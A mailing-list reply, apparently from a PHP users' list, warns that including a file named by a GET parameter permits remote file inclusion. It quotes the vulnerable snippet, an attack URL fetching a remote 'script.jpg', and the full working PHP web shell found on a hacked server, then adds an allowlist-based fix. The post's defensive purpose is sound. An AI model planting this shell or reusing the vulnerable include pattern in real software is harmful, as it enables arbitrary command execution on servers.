I just want to help avoid undesirable things :)

On 13/12/05, LuckyGuy354 <[EMAIL PROTECTED]> wrote:
>
> Use the is_file() function. Example:
>
> <?php
>
> $filex = $_GET['mode'].".php";
>
> if(is_file($filex))
> include $filex;
> else include "errorpage.php";
>
> ?>

Suppose a "hacker" writes the URL like this:

http://www.yoursite.com/yourfile.php?mode=http://www.geocities.com/hackersite/script.jpg

where the contents of script.jpg look more or less like this:

----- script snippet ----
<b>#</b>php injection: <br>
<FORM name=injection METHOD=POST ACTION="<?php echo $_SERVER["REQUEST_URI"];?>">
cmd : <INPUT TYPE="text" NAME="cmd" value="<?php echo stripslashes(htmlentities($_POST['cmd'])); ?>" size="100">
<br>
<INPUT TYPE="submit">
</FORM>
<hr color=777777 width=100% height=115px>
</font>
<pre><font color=lime size=2><b>
<p align=left><?
$cmd = $_POST['cmd'];
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
---- script snippet ----

The result is that this person can copy files onto your server at will. So, be careful.

PS: the script is not mine. This is what I found while repairing a server that had been hacked, and the mistake was indeed that it include()'d a file taken from the GET method.

--
Best regards,
Natali Ardianto
[EMAIL PROTECTED]
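Added example, not from the thread or from either poster: the include-from-GET pattern the thread warns about, beside a hardened version that maps the mode parameter onto a fixed allowlist of local files so request data never reaches include() as a path. Page names and paths are hypothetical.

```php
<?php
// Added example (not the thread's code). Page names/paths are hypothetical.

// Vulnerable: the include path is built from request data. is_file() only
// confirms that *something* exists at that path; it does not restrict *which*
// file the request may select.
function page_include_vulnerable(string $mode): void
{
    $filex = $mode . ".php";
    if (is_file($filex)) {
        include $filex;
    } else {
        include "errorpage.php";
    }
}

// Hardened: the request parameter is a lookup key into a fixed map of known
// page files. Any value not in the map resolves to the error page, so no
// attacker-controlled string is ever used as a file name or stream wrapper.
function resolve_page(string $mode): string
{
    $pages = [
        'home'    => __DIR__ . '/pages/home.php',
        'about'   => __DIR__ . '/pages/about.php',
        'contact' => __DIR__ . '/pages/contact.php',
    ];
    return $pages[$mode] ?? __DIR__ . '/errorpage.php';
}

function page_include_hardened(string $mode): void
{
    include resolve_page($mode);
}

// Usage: the parameter comes from the query string exactly as in the thread.
$mode = isset($_GET['mode']) ? (string) $_GET['mode'] : 'home';
page_include_hardened($mode);
```

As defence in depth, disable remote includes in php.ini (allow_url_include = Off, and allow_url_fopen = Off where the application does not need it) so that even a stray include() of a URL is refused by the interpreter.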
